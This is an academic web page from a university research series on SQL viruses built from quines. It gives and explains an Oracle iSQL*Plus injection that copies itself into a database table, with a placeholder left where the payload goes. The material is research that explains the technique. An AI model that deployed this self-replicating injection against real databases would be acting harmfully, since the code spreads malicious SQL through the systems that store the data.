logo
Go to the homepage of the Vrije Universiteit. Go to the homepage of the faculty of sciences.

SQL Virus Using Quines for Oracle (iSQL*Plus)


The Oracle exploit (Exploit  1) is functionally similar to the PostgreSQL version. The differences are explained below.
%content%' WHERE TagId='%id%';linebreak
CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN 'UPDATE ContainerContents SET NewContents=''%content%'''' WHERE TagId=''''%id%'''';'' || CHR(10) || ''CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN '''''' || replace(replace(a, '''''''', ''''''''''''), CHR(10), '''''' || CHR(10) || '''''') || ''''''; END;'' || CHR(10) || ''/'' || CHR(10) || a;' || CHR(10) || 'DROP FUNCTION a;' || CHR(10) || '%payload%' || CHR(10) || '--'; END;linebreak
/linebreak
UPDATE ContainerContents SET NewContents='%content%'' WHERE TagId=''%id%'';' || CHR(10) || 'CREATE FUNCTION a RETURN VARCHAR IS BEGIN RETURN ''' || replace(replace(a, '''', ''''''), CHR(10), ''' || CHR(10) || ''') || '''; END;' || CHR(10) || '/' || CHR(10) || a;linebreak
DROP FUNCTION a;linebreak
%payload%linebreak
--linebreak
Exploit  1 - Oracle (iSQL*Plus) exploit. Only the marked linebreaks are significant
The main difference with the PostgreSQL version is the fact that iSQL*Plus is particular about the linebreaks in the code. To handle this, the queries are extended to copy the linebreaks; CHR(10) is a function that returns the newline character.

In the UPDATE statement, code to create the temporary function is written to the NewContents field. The body of the function is created using the function that is created in the second line, like it is in the PostgreSQL query. In this case, however, the function returns a string containing newlines. This string is processed using the replace function to replace the newlines in with ' || CHR(10) || '. This ensures that the code that is written to the database is an exact copy of the currently running query.

Finally, Oracle doesn't provide PostgreSQL's quote_literal function. The replace function is used instead. PostgreSQL's quote_literal function encloses the string in quotes, but replace does not. Therefore, the call to trim is not needed.

Previous SQL Virus Using Quines for PostgreSQL
Up SQL Virus Using Quines
Payloads Next

Last modified: Thursday, 02 March 2006 15:13, CET
If you spot a mistake, please e-mail the maintainer of this page.
Your browser does not fully support CSS. This may result in visual artifacts.